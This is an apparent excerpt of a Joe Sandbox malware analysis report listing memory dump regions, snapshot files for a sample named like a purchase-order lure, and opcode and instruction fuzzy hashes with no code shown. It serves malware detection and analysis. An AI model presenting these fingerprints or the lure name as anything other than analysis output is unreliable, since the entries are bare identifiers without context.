                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adef7725ef4628ccfe10853f28ffd03b65de595fa754f1fc1e1e3b55256f5a1c
                                                          • Instruction ID: fbad8ee51b7be3c41e9defae89ab872c704fd05f3a624e70fbdd292303c2afac
                                                          • Opcode Fuzzy Hash: adef7725ef4628ccfe10853f28ffd03b65de595fa754f1fc1e1e3b55256f5a1c
                                                          • Instruction Fuzzy Hash: 99E026A290D180CBE70E97386CE21623FA1EA9219438851C5F8489B175F63CA503E752
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb4c31b854d7734883eaa5306dfab933fdfca56253c3e22d381eaacc18334de7
                                                          • Instruction ID: 84562f1a4e2f20abffba71c2be9af768bedc7dad26efcdfd70ceb0507c45abfd
                                                          • Opcode Fuzzy Hash: bb4c31b854d7734883eaa5306dfab933fdfca56253c3e22d381eaacc18334de7
                                                          • Instruction Fuzzy Hash: D7E06534808108FBCF01DFD4E940AADBF76FB48310F10C09AEC4423251CBB29A61EB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 65499e43792201c366b0210282adaf8c6d44908f7f8a9c0cd7237d4caebf1e48
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: 30E0C274E05208EFCB44DFA8D540AADBBF5EB88314F20C0AA9C49A3341D736AE51DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 0edc99eee0c8bc24a937a77809ce4242f2b8a13359683bd77b0505678022737e
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: A9E0C274E05208EFCB44DFA8E540AADBBF5EB48310F14D0AA9849A3341D6769A51EF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: a3ebdff649d6b3cee34082119580fdd33ff7debbe451adcc0b3ca4247d3ab902
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: 97E0C974D45208EFCB84DFA8D544AADBBF5EB48310F14C1AA985893341D6359E51DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 93917f9b5e6b44ea5e8c2084cb5cdd16a8fba98da0f23e0f3617c3fcd0128f6f
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: A1E0C274E05208EFCB84EFA8D540AADBBF5EB48310F10C0AA9858A3341D6369A51DF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99b951520f13ffafac28fe9f094863923001bb0b566b9e12539e98cdabd47f83
                                                          • Instruction ID: dc2d82bb50c236e3014d4f2b2db0b6807fbb650c4bcf40d21059a474b769801e
                                                          • Opcode Fuzzy Hash: 99b951520f13ffafac28fe9f094863923001bb0b566b9e12539e98cdabd47f83
                                                          • Instruction Fuzzy Hash: 93E020303495809FD718CF25F4997EA33D39791301F2C4279C109C39AEE6F54842C518
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a87b434fceb167a36eae10019da8c22706efaa0bd7f1aa470b419fd9a688f98a
                                                          • Instruction ID: 6e80d8354d00aa8df84df0a86c5706ab653dfd3e357706584d3c6f427c2bcd0c
                                                          • Opcode Fuzzy Hash: a87b434fceb167a36eae10019da8c22706efaa0bd7f1aa470b419fd9a688f98a
                                                          • Instruction Fuzzy Hash: 92E0E574D09108EFC745DFA8D540AADBBB8EB48300F14C0AAE84997342DA31AA51DF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83095de54b09146443b708259adc94a96954f5cc0f6222ae960b4776a6310a42
                                                          • Instruction ID: 8babef39f52a7c569402431f47fa0f89bf9d25130a6a44285fddb29e11cdfc6c
                                                          • Opcode Fuzzy Hash: 83095de54b09146443b708259adc94a96954f5cc0f6222ae960b4776a6310a42
                                                          • Instruction Fuzzy Hash: 26F06270D4126A8FDB65DF54D888BEDBAB1BB48318F2558E9D419A2250D7345EC0CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74473865e8d28683c78fe5b7b2a570838af1f33d05dacd2cffcfa135a5b0cd30
                                                          • Instruction ID: b1668c4896d75cde24759586bb5722a8bcbf4e9842d7f7687747401f6b31cf40
                                                          • Opcode Fuzzy Hash: 74473865e8d28683c78fe5b7b2a570838af1f33d05dacd2cffcfa135a5b0cd30
                                                          • Instruction Fuzzy Hash: D9E0E574D05208EFCB55DFE8D5406ADBBB5EB49300F1084AAD808A3300D7369A51DF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e7247a1374769379306e881f2549cda3915fce1b83e3cd23cbb9380d5e3c5a4
                                                          • Instruction ID: 70e3a8e42f4bae917234b8f76307dcd1989913ab47ed63d9424ae1fbf00dc375
                                                          • Opcode Fuzzy Hash: 5e7247a1374769379306e881f2549cda3915fce1b83e3cd23cbb9380d5e3c5a4
                                                          • Instruction Fuzzy Hash: 79E09234909208DFCF02DFA4DA409ADBF71EB6A311F14C49AD84867751C7329E55DB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction ID: 2fda885d3a5a1b67c792496d8c72ce2e3378bf3a6c328416447c939182a4480d
                                                          • Opcode Fuzzy Hash: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction Fuzzy Hash: 04E0E574E05208EFCB44EFA8D5416ACFBF4EB48310F20C0EAD808A3351D635AA42CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44b14ddbd25074a2eccb79ad554fcda1e662a8abcf306a1e7a32687a6440bc37
                                                          • Instruction ID: 2195570c94c04c937191863382262c9664196204509241b93d7e6519592151c7
                                                          • Opcode Fuzzy Hash: 44b14ddbd25074a2eccb79ad554fcda1e662a8abcf306a1e7a32687a6440bc37
                                                          • Instruction Fuzzy Hash: 63F05870A063449FD3548B24C9993997BB1AB46300F1480E5E08EA3265CE34AD89CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5fe63e2f2d733acffcd324e943f7480d17bf8ae7eae7f4c5a83c8c82b74cead
                                                          • Instruction ID: e08af726f1ee7bf824c7fbf99faf060d08d32c2c65ae96803df6535637685849
                                                          • Opcode Fuzzy Hash: a5fe63e2f2d733acffcd324e943f7480d17bf8ae7eae7f4c5a83c8c82b74cead
                                                          • Instruction Fuzzy Hash: 0DE04871A05348AFC704DB74D95166D7BB5DB85200F4594DDF404DB251EA356F009751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction ID: 9cdaba20123e2df3f8ec8aca46b8301707e5ebf5c55cc13c7d52de03c730d0c4
                                                          • Opcode Fuzzy Hash: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction Fuzzy Hash: ABE0E574E0520CEFCB44DFA8D5406ACBBF4EB89310F10C4EAD80893341D636AA42CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4e53103b11a3661ca55e5a772508aa7c63f84aa31b2a26957cae9ddc1fc27cd
                                                          • Instruction ID: 3665f27863fb49bc09b33069c15feaadc24e02cbdd941fd5bc20fd04100fd1de
                                                          • Opcode Fuzzy Hash: b4e53103b11a3661ca55e5a772508aa7c63f84aa31b2a26957cae9ddc1fc27cd
                                                          • Instruction Fuzzy Hash: 45E08CB6E04208DFCB50DFBCE9916DC7BF2EB95305B1495A9D008D7362EA300F06AB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c86ea062dd33a0155c03d716ba3f63ddba62b3ecb72c90f5be2b2e07316756
                                                          • Instruction ID: a9528ee781cd086f279bb0c56712c09eecf6927fdec658817a47bf1f3f3c8d59
                                                          • Opcode Fuzzy Hash: a8c86ea062dd33a0155c03d716ba3f63ddba62b3ecb72c90f5be2b2e07316756
                                                          • Instruction Fuzzy Hash: A1E0863450D1489FD301CB98D9056697FBCD74A200F1584DFD4085B382D6329E01CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa152fe3712fde26ce471cdda15859346c01cef7058e4f2e7e9617c76f8fb955
                                                          • Instruction ID: 2d6e197000dd9d66f38c80409d4ed0b38e85ab487a55238fd4aa0aaf23a8e508
                                                          • Opcode Fuzzy Hash: aa152fe3712fde26ce471cdda15859346c01cef7058e4f2e7e9617c76f8fb955
                                                          • Instruction Fuzzy Hash: 86F06274904258DFCB19DF69D484B98BBB2FB49300F0094A6E449A7225DBB55D84CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 710cb3c7e03ef6afcf7c4407250a7e21379358998339a4dd31a6154262596287
                                                          • Instruction ID: b2a9322e65f984608fd1234292125b6fa2166b301b6748def0fafb8f66a324e9
                                                          • Opcode Fuzzy Hash: 710cb3c7e03ef6afcf7c4407250a7e21379358998339a4dd31a6154262596287
                                                          • Instruction Fuzzy Hash: C5E01A70D4520CEFCB54EFA8D0446ACBBB5EB48310F5080EAD809A3340D775AA40CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4e3811a8301fa39f17b5735360651402e4f8d4025b872c3127d39e69142bff8
                                                          • Instruction ID: 5032fcc7769e498e99acd6e7411b45aa7d165395e13e50e11e43041f30154449
                                                          • Opcode Fuzzy Hash: e4e3811a8301fa39f17b5735360651402e4f8d4025b872c3127d39e69142bff8
                                                          • Instruction Fuzzy Hash: 08E06D301042459BC754EBACC5C4BA8BBE1EB06228F2446E998588B293C7326943CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2204416883d213efe8e94aea53ca523b80336424404d651149347256e049aa3
                                                          • Instruction ID: c38b4ddd0e460d91045fcd9363dc2518779d6ee2d6b5f3d83009514228cacb25
                                                          • Opcode Fuzzy Hash: d2204416883d213efe8e94aea53ca523b80336424404d651149347256e049aa3
                                                          • Instruction Fuzzy Hash: 78E04F75A12148EBCB04EBA8E9547AD7BF5EBC4300F10C999E908A7340DE715E009792
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a582ff9edb3eefc4ccd3340fcc02c626f28187f96741696c61742843e3115b8b
                                                          • Instruction ID: 7d56a4e45e668f8a522ec217e629283ac61359b6d8e27c2d2fa3945dd222c90b
                                                          • Opcode Fuzzy Hash: a582ff9edb3eefc4ccd3340fcc02c626f28187f96741696c61742843e3115b8b
                                                          • Instruction Fuzzy Hash: 79E04F74909118ABC704DFE8E5409ADFBB8AB49311F10D0A9E84457341CA31AE41EF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6416c023e64e22b635aa0cf13e24961b764c65de7890e4c6f94306a9c66e109
                                                          • Instruction ID: 64a8f65689bca8464620c542107dcf3556d5a1dfd6d02691bd558371a1e9297d
                                                          • Opcode Fuzzy Hash: f6416c023e64e22b635aa0cf13e24961b764c65de7890e4c6f94306a9c66e109
                                                          • Instruction Fuzzy Hash: D0E0C230314641CBE7148F6AF88D36733DB9780701F6C8172E00CC295ED6F198918128
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34716d6c5a15431c7514cbe19f3a342b3b154d78f78eaa76cb6520bd7dd99760
                                                          • Instruction ID: 4945b9642191375794cdf0c6304c61a73c82fe4f287faf81391055b61903c953
                                                          • Opcode Fuzzy Hash: 34716d6c5a15431c7514cbe19f3a342b3b154d78f78eaa76cb6520bd7dd99760
                                                          • Instruction Fuzzy Hash: D8E01A34D0910CEBC704DBA8D5515ACBBB5EB48200F10C0EAD85953381C6359A41DF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0db1483d1b9159df36ffcea94bb408df1c85892fd148ce46a3f3e7c67aa4bdf
                                                          • Instruction ID: 70e369c82d7cf1ba24cfe5ee901dbc3b3a6f0ce89abd2f89411c18e81ea7073b
                                                          • Opcode Fuzzy Hash: b0db1483d1b9159df36ffcea94bb408df1c85892fd148ce46a3f3e7c67aa4bdf
                                                          • Instruction Fuzzy Hash: 4CE08C34909208EBCB05EFA8D9409ADBBB9EB4A314F10C0A9DC0423351CB329E52DF94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 183581c513d329c334191df157a355d5a89b7b5cd1e92eea17a075b249977024
                                                          • Instruction ID: a7f0b98e651e860f178e8817c8ac0631ec9a34aafa1a8d480ef157662ef14d26
                                                          • Opcode Fuzzy Hash: 183581c513d329c334191df157a355d5a89b7b5cd1e92eea17a075b249977024
                                                          • Instruction Fuzzy Hash: E0E0CD3454D014DBCB06CBA4C540768B769DB45215F04849DC809573D2CB75DD16D741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0a195c81a752b1fd32e9cd180bbe0cfb9a4eac168402084e76103b0f08693fe
                                                          • Instruction ID: f85c16d3c716a466e52066f8b4c3fa31575e8fc81d709f373916ab0591da5136
                                                          • Opcode Fuzzy Hash: f0a195c81a752b1fd32e9cd180bbe0cfb9a4eac168402084e76103b0f08693fe
                                                          • Instruction Fuzzy Hash: 9DE0BF74A05108EFC784EFA8D9456ACBBF5EB48214F1084E9DC0993341DA71AE41DB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ccbde35cf23f08d0c1ce011f7321a6cee356e4f535e64ee8d964bb6b07ebd8f
                                                          • Instruction ID: dddafa520a93c457e1f1a1ccc4ab87c31e6265db6a1276e7b5be33396452c0c1
                                                          • Opcode Fuzzy Hash: 4ccbde35cf23f08d0c1ce011f7321a6cee356e4f535e64ee8d964bb6b07ebd8f
                                                          • Instruction Fuzzy Hash: CCE09270644145DBD794CAA8C9847A8BBF0EB49320F1481DECC689B392CA366A42CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32824bbcdcbf0bc155575449540242bbf7a02d6a88281a0f6818c39c0bb9b859
                                                          • Instruction ID: 2ab8c4c8ab34dbf9219e137c1119b73ff1d47dd35144d0bd2810225473b4157c
                                                          • Opcode Fuzzy Hash: 32824bbcdcbf0bc155575449540242bbf7a02d6a88281a0f6818c39c0bb9b859
                                                          • Instruction Fuzzy Hash: E8F08570A00208CFDB08DF98D8E479CBBB2EB88301F0480C6E449A3280CF746D85CF12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ab7c8d752cba7289572dc52123cd3d6e35fc123d584e1f4d17ed3ddb73c55b1
                                                          • Instruction ID: 0bef76ba67d2a8a2b5a485e04f8d51dbb28049985229bf6d4c5508a080b48b55
                                                          • Opcode Fuzzy Hash: 7ab7c8d752cba7289572dc52123cd3d6e35fc123d584e1f4d17ed3ddb73c55b1
                                                          • Instruction Fuzzy Hash: 65E0BF74905108DFCB84DFA8D5456ACBBF4EB48314F2084AA9C0997751EA71AE41CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0be3b080394cd3556d49109be69041a9616b886de0d3dcac4ff140f1104a1269
                                                          • Instruction ID: de8ff004b52200d4e391c831e8ec10cb81cc5eaed34f1f1e8090e8c4f7b5f8c4
                                                          • Opcode Fuzzy Hash: 0be3b080394cd3556d49109be69041a9616b886de0d3dcac4ff140f1104a1269
                                                          • Instruction Fuzzy Hash: 5CE01234D09208ABCB08DBA9E5406ACBBB4EB88204F10C5AED85853341DB369E42DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3888dcd2eb1a19fa25d89c81eab43186d2cecb8d2e26df8fffa2b9d9b571096
                                                          • Instruction ID: a8769e0a1c2c22d2ad2c17b13ab391b6d8944dd39c56e5de0604519b0c52bcbf
                                                          • Opcode Fuzzy Hash: b3888dcd2eb1a19fa25d89c81eab43186d2cecb8d2e26df8fffa2b9d9b571096
                                                          • Instruction Fuzzy Hash: 80E08C34909108EBC704DFA8D9449ACBFB9EB45304F1080DDC80923341CA329E42CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecada45d7e1e3b1b7fcf579acc988732c45831af0cccde6e901f63b9fb1edf61
                                                          • Instruction ID: 6c2c7c86ccbbae2f1ae8e8642688cd2fb0bdabc2c3c26436709847406a04e372
                                                          • Opcode Fuzzy Hash: ecada45d7e1e3b1b7fcf579acc988732c45831af0cccde6e901f63b9fb1edf61
                                                          • Instruction Fuzzy Hash: 8EE0EC7090920CDFCB44EFB8D5456ADBBB9EB09305F1044EDD80993341E7719A80CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
